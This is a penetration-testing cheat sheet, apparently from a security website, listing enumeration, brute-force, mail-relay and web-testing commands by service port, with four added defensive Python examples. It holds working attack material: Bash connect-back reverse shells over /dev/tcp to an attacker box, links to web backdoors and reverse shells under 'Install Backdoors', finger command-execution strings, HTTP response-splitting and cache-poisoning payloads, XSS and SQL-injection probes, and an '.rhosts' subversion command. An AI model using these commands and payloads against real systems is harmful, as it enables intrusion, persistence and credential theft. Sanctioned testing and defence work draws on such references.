Penetration
Penetration testing methodology
http://www.0daysecurity.com/penetration-testing/penetration.html
- Discovery & Probing
- Enumeration
- Network Footprinting
- Password Cracking
- Voip Security
- Vulnerability Assessment
- Wireless Penetration
- General Penetration
Discovery & Probing
- Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS fingerprinting, and identifying the remote applications being served. OS fingerprinting, or TCP/IP stack fingerprinting, is the process of determining the operating system running on a remote host by analysing the packets received from that host. There are two distinct ways to fingerprint an OS: actively (e.g. nmap) or passively (e.g. scanrand). Passive OS fingerprinting determines the remote OS from the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy: it sends packets to the remote host and waits for a reply (or the lack of one). Different operating systems respond differently to certain types of packet (the response is governed by the relevant RFC plus any proprietary behaviour the vendor, notably Microsoft, has enabled in its stack), so custom-crafted packets can be sent to tell them apart. The remote applications served by a host can be determined from the ports open on that host; port scanning therefore builds up a picture of which applications are running, so that the test can be tailored accordingly.
- Default Port Lists
- Windows *nix
- Enumeration tools and techniques - The vast majority can be used generically; however, certain bespoke applications require their own specific toolsets. Default passwords are platform and vendor specific.
- General Enumeration Tools
- nmap
- nmap -n -A -PN -p- -T aggressive -iL nmap.targetlist -oX nmap.syn.results.xml
- nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
- nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
- nmap -A -sS -PN -n --script=all ip_address --reason
- grep "appears to be up" nmap_saved_filename | awk -F'(' '{print $2}' | awk -F')' '{print $1}' > ip_list
- netcat
- nc -v -n IP_Address port
- nc -v -w 2 -z IP_Address port_range/port_number
- amap
- amap -bqv 192.168.1.1 80
- amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
- xprobe2
- xprobe2 192.168.1.1
- sinfp
- ./sinfp.pl -i -p
- nbtscan
- nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
- hping
- hping ip_address
- scanrand
- scanrand ip_address:all
- unicornscan
- unicornscan [options 'b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:'] IP_ADDRESS/CIDR_NET_MASK:S-E
- netenum
- netenum network/netmask timeout
- fping
- fping -a -d hostname (or Network/Subnet_Mask)
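Added example (not from the original page): a small parser for the nmap -oX XML produced by the first nmap command above, diffing the open ports it reports against an expected-exposure baseline so that unexpected services stand out; the XML document and the baseline are constructed.

```python
"""Parse nmap -oX output into a list of open ports and diff it against an
expected-exposure baseline. Added example; the XML below is constructed."""
import xml.etree.ElementTree as ET

# Constructed sample in nmap's XML schema: two hosts, two unexpected services.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -n -A -PN -p- -oX nmap.syn.results.xml">
  <host><status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="23"><state state="closed"/><service name="telnet"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/></port>
      <port protocol="udp" portid="161"><state state="open|filtered"/><service name="snmp"/></port>
    </ports>
  </host>
</nmaprun>
"""


def open_ports(xml_text):
    """Return [(ip, proto, port, service)] for every port nmap reports as open.
    'open|filtered' (typical for UDP, where silence is ambiguous) is kept as
    well, because from a defender's view it is still a possibly exposed service."""
    root = ET.fromstring(xml_text)
    found = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        for port in host.iter("port"):
            state = port.find("state").get("state")
            if not state.startswith("open"):
                continue
            svc = port.find("service")
            name = svc.get("name", "unknown") if svc is not None else "unknown"
            found.append((ip, port.get("protocol"), int(port.get("portid")), name))
    return found


def unexpected_exposure(xml_text, baseline):
    """baseline: {ip: {(proto, port), ...}} of services meant to be reachable.
    Returns the open ports not covered by the baseline, i.e. what to investigate."""
    return [f for f in open_ports(xml_text)
            if (f[1], f[2]) not in baseline.get(f[0], set())]


if __name__ == "__main__":
    baseline = {"192.0.2.10": {("tcp", 22), ("tcp", 80)}}
    for ip, proto, port, name in unexpected_exposure(SAMPLE_NMAP_XML, baseline):
        print(f"{ip} {proto}/{port} ({name}) is open but not in the baseline")
```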
- Firewall Specific Tools
- firewalk
- firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
- ftester
- host 1: ./ftestd -i eth0 -v
- host 2: ./ftest -f ftest.conf -v -d 0.01
- then: ./freport ftest.log ftestd.log
- Active Hosts
- Open TCP Ports
- Closed TCP Ports
- Open UDP Ports
- Closed UDP Ports
- Service Probing
- SMTP Mail Bouncing
- Banner Grabbing
- Other
- HTTP
- Commands
- JUNK / HTTP/1.0
- HEAD / HTTP/9.3
- OPTIONS / HTTP/1.0
- HEAD / HTTP/1.0
- Extensions
- WebDAV ASP.NET Frontpage OWA IIS ISAPI PHP OpenSSL
- HTTPS
- Use stunnel to encapsulate traffic.
- SMTP
- POP3
- FTP
- If the banner has been altered, attempt anonymous logon and execute the 'quote help' and 'syst' commands.
- ICMP Responses
- Type 3 (Port Unreachable)
- Type 8 (Echo Request)
- Type 13 (Timestamp Request)
- Type 15 (Information Request)
- Type 17 (Subnet Address Mask Request)
- Responses from broadcast address
- Source Port Scans
- TCP/UDP 53 (DNS)
- TCP 20 (FTP Data)
- TCP 80 (HTTP)
- TCP/UDP 88 (Kerberos)
- Firewall Assessment
- Firewalk TCP/UDP/ICMP responses
OS Fingerprint
Enumeration
- FTP port 21 open
- Fingerprint server
- telnet ip_address 21 (banner grab)
- Run command: ftp ip_address ftp@example.com
- Check for anonymous access
- ftp ip_address, Username: anonymous OR anon, Password: any@email.com
- Password guessing
- Hydra brute force
- medusa
- Brutus
- Examine configuration files
- ftpusers ftp.conf proftpd.conf
- MiTM
- pasvagg.pl
- SSH port 22 open
- Fingerprint server
- telnet ip_address 22 (banner grab)
- scanssh
- scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
- Password guessing
- ssh root@ip_address
- guess-who
- ./b -l username -h ip_address -p 22 -2 < password_file_location
- Hydra brute force
- brutessh
- Ruby SSH Bruteforcer
- Examine configuration files
- ssh_config sshd_config authorized_keys ssh_known_hosts .shosts
- SSH Client programs
- tunnelier winsshd putty winscp
- Telnet port 23 open
- Fingerprint server
- telnet ip_address
- Common Banner List

| OS | Banner |
|---|---|
| Solaris 8 | SunOS 5.8 |
| Solaris 2.6 | SunOS 5.6 |
| Solaris 2.4 or 2.5.1 | Unix(r) System V Release 4.0 (hostname) |
| SunOS 4.1.x | SunOS Unix (hostname) |
| FreeBSD | FreeBSD/i386 (hostname) (ttyp1) |
| NetBSD | NetBSD/i386 (hostname) (ttyp1) |
| OpenBSD | OpenBSD/i386 (hostname) (ttyp1) |
| Red Hat 8.0 | Red Hat Linux release 8.0 (Psyche) |
| Debian 3.0 | Debian GNU/Linux 3.0 / hostname |
| SGI IRIX 6.x | IRIX (hostname) |
| IBM AIX 4.1.x | AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994. |
| IBM AIX 4.2.x or 4.3.x | AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996. |
| Nokia IPSO | IPSO (hostname) (ttyp0) |
| Cisco IOS | User Access Verification |
| Livingston ComOS | ComOS - Livingston PortMaster |

- telnetfp
- Password Attack
- Common passwords
- Hydra brute force
- Brutus
- telnet -l "-froot" hostname (Solaris 10+)
- Examine configuration files
- /etc/inetd.conf /etc/xinetd.d/telnet /etc/xinetd.d/stelnet
- Sendmail Port 25 open
- Fingerprint server
- telnet ip_address 25 (banner grab)
- Mail Server Testing
- Enumerate users
- VRFY username (verifies if username exists - enumeration of accounts)
- EXPN username (verifies if username is valid - enumeration of accounts)
- Mail Spoof Test
- HELO anything
- MAIL FROM: spoofed_address
- RCPT TO: valid_mail_account
- DATA
- .
- QUIT
- Mail Relay Test
- HELO anything
- Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
- Unknown domain - mail from: <user@unknown_domain>
- Domain not present - mail from: <user@localhost>
- Domain not supplied - mail from: <user>
- Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
- Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
- Use double quotes - mail from: <user@domain> rcpt to: <"user@recipient-domain">
- Use IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
- Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
- Disparate formatting 2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
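Added example (not from the original page): the relay-acceptance policy an MTA needs in order to pass every relay test above, i.e. relay only when the final recipient domain is one it hosts, whatever the envelope sender claims. The local domains, addresses and sample envelopes are constructed.

```python
"""Relay-acceptance decision for an MTA, covering the relay test cases listed
above. Added example; LOCAL_DOMAINS / LOCAL_IPS and all envelopes are constructed."""

LOCAL_DOMAINS = {"example.com"}   # domains this MTA accepts mail for (constructed)
LOCAL_IPS = {"192.0.2.25"}        # its own addresses, for the user@[IP] form (constructed)


def domain_of(address):
    """Return the lower-cased domain part of an envelope address, or None."""
    addr = address.strip().strip("<>")
    if "@" not in addr:
        return None
    return addr.rsplit("@", 1)[1].lower()


def is_local_domain(domain):
    """True for a hosted domain or a bracketed literal of one of our own IPs."""
    if domain is None:
        return False
    if domain.startswith("[") and domain.endswith("]"):
        return domain[1:-1] in LOCAL_IPS
    return domain in LOCAL_DOMAINS


def relay_decision(mail_from, rcpt_to):
    """Decide whether RCPT TO may be accepted for the given MAIL FROM.
    The sender is deliberately not consulted: every 'mail from' variant in the
    tests above (empty, localhost, our own IP, our own domain) is trivially
    forgeable, so only the recipient can drive the relay decision."""
    rcpt = rcpt_to.strip().strip("<>").strip('"')
    # Source routes (@host:user@dom), percent hacks (user%dom@host) and UUCP
    # bang paths (host!user@dom) name a final destination that is not the
    # domain after the last '@'; refuse them rather than try to interpret them.
    if rcpt.startswith("@") or "%" in rcpt or "!" in rcpt:
        return "refused: source-routed recipient"
    if rcpt.count("@") != 1:
        return "refused: malformed recipient"
    if is_local_domain(domain_of(rcpt)):
        return "accepted: local delivery"
    return "refused: relaying denied"


if __name__ == "__main__":
    for env in [("<>", "<postmaster@example.com>"),
                ("<user@[192.0.2.25]>", "<nobody@attacker.test>"),
                ("<user@[192.0.2.25]>", "<@example.com:nobody@attacker.test>"),
                ("<user@[192.0.2.25]>", "<attacker.test!nobody@[192.0.2.25]>")]:
        print(env, "->", relay_decision(*env))
```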
- Examine Configuration Files
- sendmail.cf submit.cf
- DNS port 53 open
- Fingerprint server/ service
- host
- host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]
- -v verbose format
- -t (query type) Allows a user to specify a record type, i.e. A, NS, or PTR.
- -a Same as -t ANY.
- -l Zone transfer (if allowed).
- -f Save to a specified filename.
- nslookup
- nslookup [ -option … ] [ host-to-find | - [ server ]]
- dig
- dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt… ]
- whois
- -h Use the named host to resolve the query
- -a Use ARIN to resolve the query
- -r Use RIPE to resolve the query
- -p Use APNIC to resolve the query
- -Q Perform a quick lookup
- DNS Enumeration
- Bile Suite
- perl BiLE.pl [website] [project_name]
- perl BiLE-weigh.pl [website] [input file]
- perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
- perl vet-mx.pl [input file] [true domain file] [output file]
- perl exp-tld.pl [input file] [output file]
- perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
- perl qtrace.pl [ip_address_file] [output_file]
- perl jarf-rev [subnetblock] [nameserver]
- txdns
- txdns -rt -t domain_name
- txdns -x 50 -bb domain_name
- txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt
- Examine Configuration Files
- host.conf resolv.conf named.conf
- TFTP port 69 open
- TFTP Enumeration
- tftp ip_address PUT local_file
- tftp ip_address GET conf.txt (or other files)
- Solarwinds TFTP server
- tftp -i <IP> GET /etc/passwd (old Solaris)
- TFTP Bruteforcing
- TFTP bruteforcer Cisco-Torch
- Finger Port 79 open
- User enumeration
- finger 'a b c d e f g h' @example.com
- finger admin@example.com
- finger user@example.com
- finger 0@example.com
- finger .@example.com
- finger **@example.com
- finger test@example.com
- finger @example.com
- Command execution
- finger "|/bin/id@example.com"
- finger "|/bin/ls -a /@example.com"
- Finger Bounce
- finger user@host@victim finger @internal@external
- Web Ports 80, 8080 etc. open
- Fingerprint server
- Telnet ip_address port
- Firefox plugins
- All
- firecat
- Specific
- add n edit cookies
- asnumber
- header spy
- live http headers
- shazou
- web developer
- Crawl website
- lynx [options] startfile/URL (options include -traversal -crawl -dump -image_links -source)
- httprint
- Metagoofil
- metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
- Web Directory enumeration
- Nikto
- nikto [-h target] [options]
- DirBuster
- Wikto
- Goolag Scanner
- Vulnerability Assessment
- Manual Tests
- Default Passwords
- Install Backdoors
- ASP
- http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
- Assorted
- http://michaeldaw.org/projects/web-backdoor-compilation/
- http://open-labs.org/hacker_webkit02.tar.gz
- Perl
- http://home.arcor.de/mschierlm/test/pmsh.pl
- http://pentestmonkey.net/tools/perl-reverse-shell/
- http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
- PHP
- http://php.spb.ru/remview/
- http://pentestmonkey.net/tools/php-reverse-shell/
- http://pentestmonkey.net/tools/php-findsock-shell/
- Python
- http://matahari.sourceforge.net/
- TCL
- http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
- Bash Connect Back Shell
- GnuCitizen
Attack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
- Neohapsis
Attack Box: nc -l -p Port -vvv
Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
- Method Testing
- nc IP_Adress Port
- HEAD / HTTP/1.0
- OPTIONS / HTTP/1.0
- PROPFIND / HTTP/1.0
- TRACE / HTTP/1.1
- PUT http://Target_URL/FILE_NAME
- POST http://Target_URL/FILE_NAME HTTP/1.x
- Upload Files
- curl
- curl -u <username:password> -T file_to_upload <Target_URL>
- curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
- put.pl
- put.pl -h target -r /remote_file_name -f local_file_name
- webdav
- cadaver
- View Page Source
- Hidden Values
- Developer Remarks
- Extraneous Code
- Passwords!
- Input Validation Checks
- NULL or null
- Possible error messages returned.
- ' , " , ; , <!
- Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
- -- , = , + , "
- Used to craft SQL Injection queries.
- ' , & , ! , | , < , >
- Used to find command execution vulnerabilities.
- "><script>alert(1)</script>
- Basic Cross-Site Scripting Checks.
- %0d%0a
- Carriage Return (%0d) Line Feed (%0a)
- HTTP Splitting
- language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>
- i.e. once decoded the server emits: Content-Length: 0, then a second response HTTP/1.1 200 OK, Content-Type: text/html, Content-Length: 47, <html>blah</html>
- Cache Poisoning
- language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>
- %7f , %ff
- Byte-length overflows; maximum 7- and 8-bit values.
- -1, other
- Integer overflow and underflow vulnerabilities.
- %n , %x , %s
- Testing for format string vulnerabilities.
- ../
- Directory Traversal Vulnerabilities.
- % , _, *
- Wildcard characters can sometimes present DoS issues or information disclosure.
- Ax1024+
- Overflow vulnerabilities.
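Added example (not from the original page): the HTTP-splitting payload from the checks above, decoded and fed to a constructed redirect handler built by string concatenation next to one that rejects CR/LF in header values, with a helper that counts how many responses a proxy or cache would see in the resulting byte stream. The redirect handler is an assumption, not code from any real application.

```python
"""HTTP response splitting: the 'language=foobar%0d%0a...' payload above only
works where a server copies the parameter into a header without rejecting
CR/LF. Added example; the redirect handlers are constructed."""
from urllib.parse import unquote

# The page's HTTP-splitting payload as it arrives, URL-encoded, in the query string.
PAYLOAD = ("foobar%0d%0aContent-Length:%200%0d%0a%0d%0a"
           "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
           "Content-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>")


def vulnerable_redirect(language):
    """Builds a redirect by string concatenation (constructed): the decoded
    parameter lands in the Location header with its CR/LF bytes intact."""
    return ("HTTP/1.1 302 Found\r\n"
            "Location: /index.php?language=" + unquote(language) + "\r\n"
            "Content-Length: 0\r\n\r\n")


def safe_header_value(value):
    """Reject CR, LF and NUL in a header value. Silently stripping them would
    also close the hole, but failing closed makes the attempt visible in logs."""
    decoded = unquote(value)
    if any(c in decoded for c in "\r\n\0"):
        raise ValueError("CR/LF/NUL in header value: possible response splitting")
    return decoded


def hardened_redirect(language):
    """Same handler with the header value validated first (constructed)."""
    return ("HTTP/1.1 302 Found\r\n"
            "Location: /index.php?language=" + safe_header_value(language) + "\r\n"
            "Content-Length: 0\r\n\r\n")


def count_responses(raw):
    """Count status lines the way a proxy or cache parses the byte stream:
    every 'HTTP/1.x ...' at the start of a line begins a new response."""
    return sum(1 for line in raw.split("\r\n") if line.startswith("HTTP/1."))


if __name__ == "__main__":
    print("vulnerable build yields", count_responses(vulnerable_redirect(PAYLOAD)), "responses")
    try:
        hardened_redirect(PAYLOAD)
    except ValueError as err:
        print("hardened build rejected it:", err)
```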
- Automated table and column iteration
- orderby.py
- ./orderby.py www.site.com/index.php?id=
- d3sqlfuzz.py
- ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--
- Vulnerability Scanners
- Acunetix Grendelscan NStealth Obiwan III w3af
- Specific Applications/ Server Tools
- Domino
- dominoaudit
- dominoaudit.pl [options] -h <IP>
- Joomla
- cms_few
- ./cms.py <site-name>
- joomsq
- ./joomsq.py <IP>
- joomlascan
- ./joomlascan.py <site> <options> (options i.e. -p/-proxy <host:port> : Add proxy support; -404 : Don't show 404 responses)
- joomscan
- ./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80
- jscan
- jscan.pl -f hostname (shell.txt required)
- aspaudit.pl
- asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
- Vbulletin
- vbscan.py
- vbscan.py <host> <port> -v
- vbscan.py -update
- ZyXel
- zyxel-bf.sh
- snmpwalk
- snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
- snmpget
- snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
- Proxy Testing
- Burpsuite Crowbar Interceptor Paros Requester Raw Suru WebScarab
- Examine configuration files
- Generic
- Examine httpd.conf/ windows config files
- JBoss
- JMX Console http://<IP>:8080/jmx-console/
- War File
- Joomla
- configuration.php diagnostics.php joomla.inc.php config.inc.php
- Mambo
- configuration.php config.inc.php
- Wordpress
- setup-config.php wp-config.php
- ZyXel
- /WAN.html (contains PPPoE ISP password)
- /WLAN_General.html and /WLAN.html (contain WEP key)
- /rpDyDNS.html (contains DDNS credentials)
- /Firewall_DefPolicy.html (Firewall)
- /CF_Keyword.html (Content Filter)
- /RemMagWWW.html (Remote MGMT)
- /rpSysAdmin.html (System)
- /LAN_IP.html (LAN)
- /NAT_General.html (NAT)
- /ViewLog.html (Logs)
- /rpFWUpload.html (Tools)
- /DiagGeneral.html (Diagnostic)
- /RemMagSNMP.html (SNMP Passwords)
- /LAN_ClientList.html (Current DHCP Leases)
- Config Backups
- /RestoreCfg.html
- /BackupCfg.html
- Note: the above config files are not human readable, and the following tool is required to break out possible admin credentials and other important settings
- ZyXEL Config Reader
- Examine web server logs
- c:\winnt\system32\Logfiles\W3SVC1
- awk -F " " '{print $3,$11}' filename | sort | uniq
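Added example (not from the original page): the awk one-liner above selects columns by position, whereas IIS W3C extended logs declare their column order in a #Fields: line; this parser reads that line, counts client-IP/status pairs by name, and flags clients whose requests are mostly 404s, the footprint a directory brute-forcer such as those listed above leaves. The log lines are constructed.

```python
"""Named-field parser for IIS W3C extended logs with a simple scanner heuristic.
Added example; SAMPLE_LOG is constructed, not a real capture."""
from collections import Counter, defaultdict

SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-03-01 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2009-03-01 00:00:01 10.0.0.5 GET /index.html - 80 - 198.51.100.7 Mozilla/4.0 200 0 0
2009-03-01 00:00:02 10.0.0.5 GET /admin/ - 80 - 203.0.113.9 Mozilla/4.0 404 0 2
2009-03-01 00:00:02 10.0.0.5 GET /backup/ - 80 - 203.0.113.9 Mozilla/4.0 404 0 2
2009-03-01 00:00:02 10.0.0.5 GET /cgi-bin/ - 80 - 203.0.113.9 Mozilla/4.0 404 0 2
2009-03-01 00:00:03 10.0.0.5 GET /scripts/ - 80 - 203.0.113.9 Mozilla/4.0 403 0 0
2009-03-01 00:00:03 10.0.0.5 GET /about.html - 80 - 198.51.100.7 Mozilla/4.0 200 0 0
2009-03-01 00:00:04 10.0.0.5 PUT /shell.asp - 80 - 203.0.113.9 Mozilla/4.0 404 0 2
"""


def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields: line.
    IIS writes a fresh #Fields: line whenever the logged columns change, so the
    current field list is tracked while reading instead of assumed up front."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if fields is None or len(values) != len(fields):
            continue  # no header yet or malformed line: skip rather than misalign columns
        yield dict(zip(fields, values))


def ip_status_counts(text):
    """Named-field equivalent of the awk pipeline: (client IP, status) -> count."""
    return Counter((r["c-ip"], r["sc-status"]) for r in parse_w3c(text))


def suspected_scanners(text, min_requests=3, not_found_ratio=0.5):
    """Clients with at least min_requests of which at least not_found_ratio were 404s,
    the pattern left by a wordlist-driven directory or file enumerator."""
    per_ip = defaultdict(Counter)
    for r in parse_w3c(text):
        per_ip[r["c-ip"]][r["sc-status"]] += 1
    return sorted(ip for ip, c in per_ip.items()
                  if sum(c.values()) >= min_requests
                  and c["404"] / sum(c.values()) >= not_found_ratio)


if __name__ == "__main__":
    for (ip, status), n in sorted(ip_status_counts(SAMPLE_LOG).items()):
        print(f"{n:4d} {ip} {status}")
    print("suspected scanners:", suspected_scanners(SAMPLE_LOG))
```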
- References
- White Papers
- Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
- Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
- Blind Security Testing - An Evolutionary Approach
- Command Injection in XML Signatures and Encryption
- Input Validation Cheat Sheet
- SQL Injection Cheat Sheet
- Books
- Hacking Exposed Web 2.0
- Hacking Exposed Web Applications
- The Web Application Hacker's Handbook
- Exploit Frameworks
- Brute-force Tools
- Acunetix
- Metasploit
- w3af
- Portmapper port 111 open
- rpcdump.py
- rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
- rpcinfo
- rpcinfo [options] IP_Address
- NTP Port 123 open
- NTP Enumeration
- ntpdc -c monlist IP_ADDRESS
- ntpdc -c sysinfo IP_ADDRESS
- ntpq
- host hostname
- ntpversion
- readlist
- version
- Examine configuration files
- ntp.conf
- NetBIOS Ports 135-139,445 open
- NetBIOS enumeration
- Enum
- enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
- Null Session
- net use \\192.168.1.1\ipc$ "" /u:""
- net view \\ip_address
- Dumpsec
- Smbclient
- smbclient -L //server/share password options
- Superscan
- Enumeration tab.
- user2sid/sid2user
- Winfo
- NetBIOS brute force
- Hydra Brutus Cain & Abel getacct NAT (NetBIOS Auditing Tool)
- Examine Configuration Files
- Smb.conf lmhosts
- SNMP port 161 open
- Default Community Strings
- public
- private
- cisco
- cable-docsis
- ILMI
- MIB enumeration
- Windows NT
- .1.3.6.1.2.1.1.5 Hostnames
- .1.3.6.1.4.1.77.1.4.2 Domain Name
- .1.3.6.1.4.1.77.1.2.25 Usernames
- .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
- .1.3.6.1.4.1.77.1.2.27 Share Information
- Solarwinds MIB walk
- Getif
- snmpwalk
- snmpwalk -v <Version> -c <Community string> <IP>
- Snscan
- Applications
- ZyXel
- snmpget -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2.6.0
- snmpwalk -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2
- SNMP Bruteforce
- onesixtyone
- onesixtyone -c SNMP.wordlist <IP>
- cat
- ./cat -h <IP> -w SNMP.wordlist
- Solarwinds SNMP Brute Force
- ADMsnmp
- Examine SNMP Configuration files
- snmp.conf snmpd.conf snmp-config.xml
- LDAP Port 389 Open
- ldap enumeration
- ldapminer
- ldapminer -h ip_address -p port (not required if default) -d
- luma
- Gui based tool
- ldp
- Gui based tool
- openldap
- ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
- ldapadd [-c] [-S file] [-n] [-v] [-k] [-K] [-M[M]] [-d debuglevel] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-h ldaphost] [-p ldap-port] [-P 2|3] [-O security-properties] [-I] [-Q] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] [-f file]
- ldapdelete [-n] [-v] [-k] [-K] [-c] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-P 2|3] [-p ldapport] [-O security-properties] [-U authcid] [-R realm] [-x] [-I] [-Q] [-X authzid] [-Y mech] [-Z[Z]] [dn]
- ldapmodify [-a] [-c] [-S file] [-n] [-v] [-k] [-K] [-M[M]] [-d debuglevel] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-O security-properties] [-I] [-Q] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] [-f file]
- ldapmodrdn [-r] [-n] [-v] [-k] [-K] [-c] [-M[M]] [-d debuglevel] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-O security-properties] [-I] [-Q] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] [-f file] [dn rdn]
- ldap brute force
- bf_ldap
- bf_ldap -s server -d domain_name -u|-U username|users_list_file -L|-l passwords_list|length_of_passwords_to_generate
- optional: -p port (default 389), -v (verbose mode), -P LDAP user path (default ,CN=Users,)
- K0ldS
- LDAP_Brute.pl
- Examine Configuration Files
- General
- containers.ldif ldap.cfg ldap.conf ldap.xml ldap-config.xml ldap-realm.xml slapd.conf
- IBM SecureWay V3 server
- V3.sas.oc
- Microsoft Active Directory server
- msadClassesAttrs.ldif
- Netscape Directory Server 4
- nsslapd.sas_at.conf nsslapd.sas_oc.conf
- OpenLDAP directory server
- slapd.sas_at.conf slapd.sas_oc.conf
- Sun ONE Directory Server 5.1
- 75sas.ldif
- PPTP/L2TP/VPN port 500/1723 open
- Enumeration
- ike-scan
- ike-probe
- Brute-Force
- ike-crack
- Reference Material
- PSK cracking paper
- SecurityFocus Infocus: Scanning a VPN Implementation
- Modbus port 502 open
- modscan
- rlogin port 513 open
- Rlogin Enumeration
- Find the files
- find / -name .rhosts
- locate .rhosts
- Examine Files
- cat .rhosts
- Manual Login
- rlogin hostname -l username
- rlogin <IP>
- Subvert the files
- echo ++ > .rhosts
- Rlogin Brute force
- Hydra
- rsh port 514 open
- Rsh Enumeration
- rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
- Rsh Brute Force
- rsh-grind
- Hydra
- medusa
- SQL Server Port 1433 1434 open
- SQL Enumeration
- piggy
- SQLPing
- sqlping ip_address/hostname
- SQLPing2
- SQLPing3
- SQLpoke
- SQL Recon
- SQLver
- SQL Brute Force
- SQLPAT
- sqlbf -u hashes.txt -d dictionary.dic -r out.rep (dictionary attack)
